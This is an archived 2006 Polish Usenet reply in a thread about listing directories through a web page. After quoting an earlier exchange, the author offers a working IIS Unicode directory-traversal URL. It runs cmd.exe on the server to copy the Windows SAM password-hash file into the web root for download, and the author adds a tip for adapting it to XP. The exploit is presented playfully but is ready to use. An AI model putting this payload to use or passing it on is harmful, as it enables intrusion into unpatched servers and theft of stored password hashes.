Re: Jak wylistowac katalog przez strone www ?

Autor: Piotr Krzyżański <piciu_at_it-faq.pl>
Data: Tue 14 Feb 2006 - 23:31:42 MET
Message-ID: <dstlsv$o6i$1@opal.icpnet.pl>
Content-Type: text/plain; format=flowed; charset="iso-8859-2"; reply-type=response

Użytkownik "Radosław Sokół" <rsokol@magsoft.com.pl> napisał w wiadomości
news:2006021420354000@grush.one.pl...
>V napisał(a):
>> A czy jest w takim razie mozliwe, by napisac skrypcik wykonujacy:
>> * przy wejsciu na dana strone robil listing katalogu (to sie da, jak widze),
>
> Ale z katalogu na *Twoim* komputerze.
>
>> * pobieral okreslony plik z jakiejs lokalizacji (przy wykorzystaniu powyzszego),
>
> To już może być niemożliwe.
>
>> * wysylal poczta na adres wpisany formularzu strony pobrany plik na
>> potwierdzenie, ze komputer jest niezabezpieczony (tez sie da) :)
>
> Pisałem: to nie świadczy o braku zabezpieczenia komputera.
> O ile mi wiadomo, wyświetlenie listy plików nie pozwalało
> na zrobienie czegokolwiek więcej.

Przez "WWW" ? No jeśli dziurawy IIS, to:
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\repair\sam.+c:\inetpub\wwwroot
i już możesz ściągać SAM do siebie ;-)))
Tak, tak - to już historia, ale jeszcze się zdarza - choć
w przypadku XP trzeba zmienić z winnt na windows. ;-P

Piciu
Received on Tue Feb 14 23:35:08 2006

To archiwum zostało wygenerowane przez hypermail 2.1.8 : Tue 14 Feb 2006 - 23:42:03 MET